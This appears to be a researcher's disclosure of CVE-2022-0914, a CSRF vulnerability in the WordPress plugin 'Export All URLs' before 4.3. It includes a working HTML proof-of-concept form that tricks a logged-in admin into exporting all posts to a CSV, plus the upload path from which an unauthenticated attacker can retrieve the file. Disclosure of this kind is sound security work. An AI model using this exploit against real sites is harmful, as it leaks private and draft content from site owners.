[31] CVE-2022-0914
During a security research I found an CSRF vulnerability. The name of the plugin is: Export All URLs , the version of the affected plugin: < 4.3
Description
The plugin does not have CSRF in place when exporting data, which could allow
attackers to make a logged in admin export all posts and pages
(including private and draft) into an arbitrary CSV file,
which the attacker can then download and retrieve the list of titles for example
POC
Make a logged in admin open
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
<input type="hidden" name="post-type" value="any" />
<input type="hidden" name="additional-data[]" value="title" />
<input type="hidden" name="post-status" value="all" />
<input type="hidden" name="posts-from" value="" />
<input type="hidden" name="posts-upto" value="" />
<input type="hidden" name="post-author" value="all" />
<input type="hidden" name="number-of-posts" value="all" />
<input type="hidden" name="starting-point" value="" />
<input type="hidden" name="ending-point" value="" />
<input type="hidden" name="csv-file-name" value="via-csrf" />
<input type="hidden" name="export-type" value="text" />
<input type="hidden" name="export" value="Export Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Then open https://example.com/wp-content/uploads/2022/03/via-csrf.CSV as an unauthenticated user
Additional information
WPSCAN link: https://wpscan.com/vulnerability/c328be28-75dd-43db-a5b9-c1ba0636c930
NIST CVSS SCORE: 6.5
Plugin has more than 30,000+ active installations.